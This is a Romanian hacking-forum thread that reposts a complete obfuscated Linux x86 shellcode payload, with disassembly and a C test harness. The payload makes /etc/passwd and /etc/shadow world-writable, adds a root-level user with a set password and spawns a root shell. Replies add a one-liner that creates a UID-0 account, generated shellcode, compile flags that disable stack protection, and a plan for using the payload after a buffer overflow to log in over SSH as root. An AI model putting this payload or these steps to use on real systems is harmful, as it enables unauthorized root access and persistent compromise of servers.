Kalashnikov. Posted October 11, 2014 Report Posted October 11, 2014 /*#Title: Obfuscated Shellcode Linux x86 chmod(777 /etc/passwd and /etc/shadow) && (Add new root user [ALI] with password [ALI] for ssh) && Setreuid() , Execute /bin/sh#length: 521 bytes#Date: 8 September 2018#Author: Ali Razmjoo#tested On: kali-linux-1.0.4-i386 [3.7-trunk-686-pae #1 SMP Debian 3.7.2-0+kali8 i686 GNU/Linux ]Ali Razmjoo , Ali.Razmjoo1994@Gmail.ComThanks to Jonathan Salwanchmod('/etc/passwd',777)chmod('/etc/shadow',777)open passwd , and write new root user with passwrd ( user: ALI pass: ALI ) , close passwdsetreuid() , execve('/bin/sh')root@user:~/Desktop/xpl# objdump -d f.of.o: file format elf32-i386Disassembly of section .text:00000000 <_start>: 0: 31 c0 xor %eax,%eax 2: 31 db xor %ebx,%ebx 4: 31 c9 xor %ecx,%ecx 6: 31 d2 xor %edx,%edx 8: bb 59 45 4f 53 mov $0x534f4559,%ebx d: ba 33 36 38 37 mov $0x37383633,%edx 12: 31 d3 xor %edx,%ebx 14: 53 push %ebx 15: c1 eb 08 shr $0x8,%ebx 18: 53 push %ebx 19: bb 7a 46 59 45 mov $0x4559467a,%ebx 1e: ba 55 36 38 36 mov $0x36383655,%edx 23: 31 d3 xor %edx,%ebx 25: 53 push %ebx 26: bb 67 58 45 4e mov $0x4e455867,%ebx 2b: ba 48 3d 31 2d mov $0x2d313d48,%edx 30: 31 d3 xor %edx,%ebx 32: 53 push %ebx 33: 89 e3 mov %esp,%ebx 35: 68 41 41 ff 01 push $0x1ff4141 3a: 59 pop %ecx 3b: c1 e9 08 shr $0x8,%ecx 3e: c1 e9 08 shr $0x8,%ecx 41: 6a 0f push $0xf 43: 58 pop %eax 44: cd 80 int $0x80 46: bb 53 49 57 4a mov $0x4a574953,%ebx 4b: ba 39 2d 38 3d mov $0x3d382d39,%edx 50: 31 d3 xor %edx,%ebx 52: c1 eb 08 shr $0x8,%ebx 55: 53 push %ebx 56: bb 6d 47 45 58 mov $0x5845476d,%ebx 5b: ba 42 34 2d 39 mov $0x392d3442,%edx 60: 31 d3 xor %edx,%ebx 62: 53 push %ebx 63: bb 6e 54 49 57 mov $0x5749546e,%ebx 68: ba 41 31 3d 34 mov $0x343d3141,%edx 6d: 31 d3 xor %edx,%ebx 6f: 53 push %ebx 70: 89 e3 mov %esp,%ebx 72: 68 41 41 ff 01 push $0x1ff4141 77: 59 pop %ecx 78: c1 e9 08 shr $0x8,%ecx 7b: c1 e9 08 shr $0x8,%ecx 7e: 6a 0f push $0xf 80: 58 pop %eax 81: cd 80 int $0x80 83: bb 73 47 4e 51 mov $0x514e4773,%ebx 88: ba 32 34 39 35 mov $0x35393432,%edx 8d: 31 d3 xor %edx,%ebx 8f: c1 eb 08 shr $0x8,%ebx 92: 53 push %ebx 93: bb 59 44 56 44 mov $0x44564459,%ebx 98: ba 76 34 37 37 mov $0x37373476,%edx 9d: 31 d3 xor %edx,%ebx 9f: 53 push %ebx a0: bb 4e 58 59 51 mov $0x5159584e,%ebx a5: ba 61 3d 2d 32 mov $0x322d3d61,%edx aa: 31 d3 xor %edx,%ebx ac: 53 push %ebx ad: 89 e3 mov %esp,%ebx af: 68 41 41 01 04 push $0x4014141 b4: 59 pop %ecx b5: c1 e9 08 shr $0x8,%ecx b8: c1 e9 08 shr $0x8,%ecx bb: 6a 05 push $0x5 bd: 58 pop %eax be: cd 80 int $0x80 c0: 89 c3 mov %eax,%ebx c2: 6a 04 push $0x4 c4: 58 pop %eax c5: 68 41 73 68 0a push $0xa687341 ca: 59 pop %ecx cb: c1 e9 08 shr $0x8,%ecx ce: 51 push %ecx cf: b9 57 67 57 58 mov $0x58576757,%ecx d4: ba 39 48 35 39 mov $0x39354839,%edx d9: 31 d1 xor %edx,%ecx db: 51 push %ecx dc: b9 4e 64 5a 51 mov $0x515a644e,%ecx e1: ba 74 4b 38 38 mov $0x38384b74,%edx e6: 31 d1 xor %edx,%ecx e8: 51 push %ecx e9: b9 47 57 56 42 mov $0x42565747,%ecx ee: ba 35 38 39 36 mov $0x36393835,%edx f3: 31 d1 xor %edx,%ecx f5: 51 push %ecx f6: b9 61 70 51 4e mov $0x4e517061,%ecx fb: ba 2d 39 6b 61 mov $0x616b392d,%edx 100: 31 d1 xor %edx,%ecx 102: 51 push %ecx 103: b9 48 58 70 74 mov $0x74705848,%ecx 108: ba 72 68 4a 35 mov $0x354a6872,%edx 10d: 31 d1 xor %edx,%ecx 10f: 51 push %ecx 110: b9 76 45 56 46 mov $0x46564576,%ecx 115: ba 3d 6b 6c 76 mov $0x766c6b3d,%edx 11a: 31 d1 xor %edx,%ecx 11c: 51 push %ecx 11d: 68 66 77 55 57 push $0x57557766 122: 68 68 70 31 50 push $0x50317068 127: 68 7a 59 65 41 push $0x4165597a 12c: 68 41 61 41 51 push $0x51416141 131: 68 49 38 75 74 push $0x74753849 136: 68 50 4d 59 68 push $0x68594d50 13b: 68 54 42 74 7a push $0x7a744254 140: 68 51 2f 38 54 push $0x54382f51 145: 68 45 36 6d 67 push $0x676d3645 14a: 68 76 50 2e 73 push $0x732e5076 14f: 68 4e 58 52 37 push $0x3752584e 154: 68 39 4b 55 48 push $0x48554b39 159: 68 72 2f 59 42 push $0x42592f72 15e: 68 56 78 4b 47 push $0x474b7856 163: 68 39 55 66 5a push $0x5a665539 168: 68 46 56 6a 68 push $0x686a5646 16d: 68 46 63 38 79 push $0x79386346 172: 68 70 59 6a 71 push $0x716a5970 177: 68 77 69 53 68 push $0x68536977 17c: 68 6e 54 67 54 push $0x5467546e 181: 68 58 4d 69 37 push $0x37694d58 186: 68 2f 41 6e 24 push $0x246e412f 18b: 68 70 55 6e 4d push $0x4d6e5570 190: 68 24 36 24 6a push $0x6a243624 195: b9 73 61 74 67 mov $0x67746173,%ecx 19a: ba 32 2d 3d 5d mov $0x5d3d2d32,%edx 19f: 31 d1 xor %edx,%ecx 1a1: 51 push %ecx 1a2: 89 e1 mov %esp,%ecx 1a4: ba 41 41 41 7f mov $0x7f414141,%edx 1a9: c1 ea 08 shr $0x8,%edx 1ac: c1 ea 08 shr $0x8,%edx 1af: c1 ea 08 shr $0x8,%edx 1b2: cd 80 int $0x80 1b4: 31 c0 xor %eax,%eax 1b6: b0 46 mov $0x46,%al 1b8: 31 db xor %ebx,%ebx 1ba: 31 c9 xor %ecx,%ecx 1bc: cd 80 int $0x80 1be: 31 c0 xor %eax,%eax 1c0: b0 46 mov $0x46,%al 1c2: 31 db xor %ebx,%ebx 1c4: 31 c9 xor %ecx,%ecx 1c6: cd 80 int $0x80 1c8: 68 52 55 48 42 push $0x42485552 1cd: 68 52 51 49 43 push $0x43495152 1d2: b9 49 4b 59 77 mov $0x77594b49,%ecx 1d7: ba 66 38 31 35 mov $0x35313866,%edx 1dc: 31 d1 xor %edx,%ecx 1de: 51 push %ecx 1df: b9 55 55 54 57 mov $0x57545555,%ecx 1e4: ba 7a 37 3d 39 mov $0x393d377a,%edx 1e9: 31 d1 xor %edx,%ecx 1eb: 51 push %ecx 1ec: 89 e3 mov %esp,%ebx 1ee: 31 c0 xor %eax,%eax 1f0: 88 43 07 mov %al,0x7(%ebx) 1f3: 89 5b 08 mov %ebx,0x8(%ebx) 1f6: 89 43 0c mov %eax,0xc(%ebx) 1f9: b0 0b mov $0xb,%al 1fb: 8d 4b 08 lea 0x8(%ebx),%ecx 1fe: 8d 53 0c lea 0xc(%ebx),%edx 201: cd 80 int $0x80 203: b0 01 mov $0x1,%al 205: b3 01 mov $0x1,%bl 207: cd 80 int $0x80root@user:~/Desktop/xpl#*/#include <stdio.h>#include <string.h>char sc[] = "\x31\xc0\x31\xdb\x31\xc9\x31\xd2\xbb\x59\x45\x4f\x53\xba\x33\x36\x38\x37\x31\xd3\x53\xc1\xeb\x08\x53\xbb\x7a\x46\x59\x45\xba\x55\x36\x38\x36\x31\xd3\x53\xbb\x67\x58\x45\x4e\xba\x48\x3d\x31\x2d\x31\xd3\x53\x89\xe3\x68\x41\x41\xff\x01\x59\xc1\xe9\x08\xc1\xe9\x08\x6a\x0f\x58\xcd\x80\xbb\x53\x49\x57\x4a\xba\x39\x2d\x38\x3d\x31\xd3\xc1\xeb\x08\x53\xbb\x6d\x47\x45\x58\xba\x42\x34\x2d\x39\x31\xd3\x53\xbb\x6e\x54\x49\x57\xba\x41\x31\x3d\x34\x31\xd3\x53\x89\xe3\x68\x41\x41\xff\x01\x59\xc1\xe9\x08\xc1\xe9\x08\x6a\x0f\x58\xcd\x80\xbb\x73\x47\x4e\x51\xba\x32\x34\x39\x35\x31\xd3\xc1\xeb\x08\x53\xbb\x59\x44\x56\x44\xba\x76\x34\x37\x37\x31\xd3\x53\xbb\x4e\x58\x59\x51\xba\x61\x3d\x2d\x32\x31\xd3\x53\x89\xe3\x68\x41\x41\x01\x04\x59\xc1\xe9\x08\xc1\xe9\x08\x6a\x05\x58\xcd\x80\x89\xc3\x6a\x04\x58\x68\x41\x73\x68\x0a\x59\xc1\xe9\x08\x51\xb9\x57\x67\x57\x58\xba\x39\x48\x35\x39\x31\xd1\x51\xb9\x4e\x64\x5a\x51\xba\x74\x4b\x38\x38\x31\xd1\x51\xb9\x47\x57\x56\x42\xba\x35\x38\x39\x36\x31\xd1\x51\xb9\x61\x70\x51\x4e\xba\x2d\x39\x6b\x61\x31\xd1\x51\xb9\x48\x58\x70\x74\xba\x72\x68\x4a\x35\x31\xd1\x51\xb9\x76\x45\x56\x46\xba\x3d\x6b\x6c\x76\x31\xd1\x51\x68\x66\x77\x55\x57\x68\x68\x70\x31\x50\x68\x7a\x59\x65\x41\x68\x41\x61\x41\x51\x68\x49\x38\x75\x74\x68\x50\x4d\x59\x68\x68\x54\x42\x74\x7a\x68\x51\x2f\x38\x54\x68\x45\x36\x6d\x67\x68\x76\x50\x2e\x73\x68\x4e\x58\x52\x37\x68\x39\x4b\x55\x48\x68\x72\x2f\x59\x42\x68\x56\x78\x4b\x47\x68\x39\x55\x66\x5a\x68\x46\x56\x6a\x68\x68\x46\x63\x38\x79\x68\x70\x59\x6a\x71\x68\x77\x69\x53\x68\x68\x6e\x54\x67\x54\x68\x58\x4d\x69\x37\x68\x2f\x41\x6e\x24\x68\x70\x55\x6e\x4d\x68\x24\x36\x24\x6a\xb9\x73\x61\x74\x67\xba\x32\x2d\x3d\x5d\x31\xd1\x51\x89\xe1\xba\x41\x41\x41\x7f\xc1\xea\x08\xc1\xea\x08\xc1\xea\x08\xcd\x80\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\x68\x52\x55\x48\x42\x68\x52\x51\x49\x43\xb9\x49\x4b\x59\x77\xba\x66\x38\x31\x35\x31\xd1\x51\xb9\x55\x55\x54\x57\xba\x7a\x37\x3d\x39\x31\xd1\x51\x89\xe3\x31\xc0\x88\x43\x07\x89\x5b\x08\x89\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d\x53\x0c\xcd\x80\xb0\x01\xb3\x01\xcd\x80";int main(void){ fprintf(stdout,"Length: %d\n\n",strlen(sc)); (*(void(*)()) sc)();} Quote
Ganav Posted October 11, 2014 Report Posted October 11, 2014 Sa inteleg ca asa arata exploit-urile din 2018. Poti specifica, te rog, pe ce distributii ruleaza? Quote
Kalashnikov. Posted October 11, 2014 Author Report Posted October 11, 2014 Sa inteleg ca asa arata exploit-urile din 2018. Poti specifica, te rog, pe ce distributii ruleaza?desigur #Title: Obfuscated Shellcode Linux x86 chmod(777 /etc/passwd and /etc/shadow) && (Add new root user [ALI] with password [ALI] for ssh) && Setreuid() , Execute /bin/sh#length: 521 bytes#Date: 8 September 2018#Author: Ali Razmjoo#tested On: kali-linux-1.0.4-i386 [3.7-trunk-686-pae #1 SMP Debian 3.7.2-0+kali8 i686 GNU/Linux ] Quote
aelius Posted October 11, 2014 Report Posted October 11, 2014 (edited) Primul test:root@pluto:~# useradd -u 0 -g 0 rst && echo -e "parolavietii\nparolavietii" |passwd rstuseradd: UID 0 is not uniqueAh, lipseste ceva:root@pluto:~# useradd -o -u 0 -g 0 rst && echo -e "parolavietii\nparolavietii" |passwd rstEnter new UNIX password: Retype new UNIX password: passwd: password updated successfullySe pare ca a functionat si mi-am adaugat user rst cu uid/gid 0 si am setat si parola pentru acesta intr-o singura linie de comanda:root@pluto:~# grep rst /etc/passwd /etc/shadow/etc/passwd:rst:x:0:0::/home/rst:/bin/sh/etc/shadow:rst:$6$zaJmMm5X$.F0fvLkcrZQwXTlR4F6HcNro8UFKHvIL8klT72w69h27fsuEZ5/Wlxlc5ScW6Dl/zEYABlpXeGIsFFBvTYiul.:16354:0:99999:7:::Hai sa incercam un shellcode generator. Nu stiu cat de bun o fi:marian@pluto:~/work$ cc shellcode_gen.c -o shellcode_genmarian@pluto:~/work$ ./shellcode_gen 'useradd -o -u 0 -g 0 rst && echo -e "parolavietii\nparolavietii" |passwd rst' output.txtShellcode lenght: 79\x31\xc0\x83\xec\x01\x88\x04\x24\x68\x2e\x74\x78\x74\x68\x74\x70\x75\x74\x66\x68\x6f\x75\x89\xe6\x83\xec\x01\x88\x04\x24\x68\x72\x61\x64\x64\x68\x2f\x75\x73\x65\x68\x73\x62\x69\x6e\x68\x75\x73\x72\x2f\x83\xec\x01\xc6\x04\x24\x2f\x50\x56\x83\xee\x12\x56\xb0\x0b\x89\xf3\x89\xe1\x31\xd2\xcd\x80\xb0\x01\x31\xdb\xcd\x80Nu stiu daca l-a generat bine, dar incercam o aroganta bisericeascamarian@pluto:~/work$ pico test.c GNU nano 2.2.6 File: test.c#include <stdio.h>unsigned char slujbaBisericeasca[] ="\x31\xc0\x83\xec\x01\x88\x04\x24""\x68\x2e\x74\x78\x74\x68\x74\x70""\x75\x74\x66\x68\x6f\x75\x89\xe6""\x83\xec\x01\x88\x04\x24\x68\x72""\x61\x64\x64\x68\x2f\x75\x73\x65""\x68\x73\x62\x69\x6e\x68\x75\x73""\x72\x2f\x83\xec\x01\xc6\x04\x24""\x2f\x50\x56\x83\xee\x12\x56\xb0""\x0b\x89\xf3\x89\xe1\x31\xd2\xcd""\x80\xb0\x01\x31\xdb\xcd\x80";main(){ int (*ret)() = (int(*)())slujbaBisericeasca; ret();}Compilam rahatul pentru a fi aruncat peste gardul vecinului:marian@pluto:~/work$ cc test.c -o testmarian@pluto:~/work$ file testtest: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.26, BuildID[sha1]=0xd291df14bd39d22a6b617f9da72ad74d4a5cc85f, not strippedmarian@pluto:~/work$Sa vedem totusi ce zice:marian@pluto:~/work$ strace ./testexecve("./test", ["./test"], [/* 13 vars */]) = 0brk(0) = 0x601000access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)mmap(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7f6e15c3a000access("/etc/ld.so.preload", R_OK) = -1 ENOENT (No such file or directory)open("/etc/ld.so.cache", O_RDONLY) = 3fstat(3, {st_mode=S_IFREG|0644, st_size=54621, ...}) = 0mmap(NULL, 54621, PROT_READ, MAP_PRIVATE, 3, 0) = 0x7f6e15c2c000close(3) = 0access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)open("/lib/x86_64-linux-gnu/libc.so.6", O_RDONLY) = 3read(3, "\177ELF\2\1\1\0\0\0\0\0\0\0\0\0\3\0>\0\1\0\0\0\0\360\1\0\0\0\0\0"..., 832) = 832fstat(3, {st_mode=S_IFREG|0755, st_size=1599536, ...}) = 0mmap(NULL, 3713112, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0x7f6e15692000mprotect(0x7f6e15813000, 2097152, PROT_NONE) = 0mmap(0x7f6e15a13000, 20480, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x181000) = 0x7f6e15a13000mmap(0x7f6e15a18000, 18520, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0x7f6e15a18000close(3) = 0mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7f6e15c2b000mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7f6e15c2a000mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7f6e15c29000arch_prctl(ARCH_SET_FS, 0x7f6e15c2a700) = 0mprotect(0x7f6e15a13000, 16384, PROT_READ) = 0mprotect(0x7f6e15c3c000, 4096, PROT_READ) = 0munmap(0x7f6e15c2c000, 54621) = 0--- SIGSEGV (Segmentation fault) @ 0 (0) ---+++ killed by SIGSEGV +++Segmentation faultNe-a dat 'Segmentation fault'. Asta inseamna ca trebuie compilat in alt fel. So, let's try to disable the fucking stack protection and enable stack execution.marian@pluto:~/work$ gcc -fno-stack-protector -z execstack -o test test.cCopyright by Preotul RST-ului anul 2021. Hai bre, ce e cu 2018 ala acolo copyright. Aveti simtul umorului prea dezvoltat sau ati fumat ceva nasol ? Astea cu shellcodes imi par deplasate rau. Practic te bazezi pe idiotenia unui om de a rula ceva ca ROOT. Astfel e logic ca nu functioneaza. Low end rau frate. Un rahat de genul il faci in cateva minute.Si de ce as seta chmod 777 pe cele doua fisiere cand pot sa generez un binar in sistem setat cu bit suid/sgid cu care pot executa orice comanda cu user/group owner. Edited October 11, 2014 by aelius Quote
Aerosol Posted October 12, 2014 Report Posted October 12, 2014 @Kalashnikov ar fi frumos sa mentionezi si sursa : Heresi mi se pare cam vechi (09.09.2014 -acum o luna...) in fine nu am vrut decat sa iti atrag atentia.Cat despre acel 2018 cel mai probabil greseala. Quote
Kalashnikov. Posted October 13, 2014 Author Report Posted October 13, 2014 @Kalashnikov ar fi frumos sa mentionezi si sursa : Heresi mi se pare cam vechi (09.09.2014 -acum o luna...) in fine nu am vrut decat sa iti atrag atentia.Cat despre acel 2018 cel mai probabil greseala.B?nuiesc c? e de ajuns autorul #Author: Ali Razmjoo . Quote
Nytro Posted October 13, 2014 Report Posted October 13, 2014 Bre, e un SHELLCODE, nu un EXPLOIT!Use case: - se da una bucata exploit (* buffer overflow sau altceva) intr-un software care ruleaza ca root (ProFTPD, PostFix sau mai stiu eu ce). E NECESAR!- se ruleaza acel exploit folosind acest shellcode, rezultatul fiind un nou cont cu permisiuni de root. Acel chmod poate fi util in anumite conditii. - se logheaza frumos pe SSH cu noul contNota: in urma executarii exploit-ului procesul poate sa crape. Si in cazul de fata ai chiar acest avantaj: poate sa crape procesul, tu ai deja acces full pe server. Se putea face backconnect de exemplu, dar aici apar probleme de iptables (firewall). La fel si cu port bind. V-ati prins? Quote
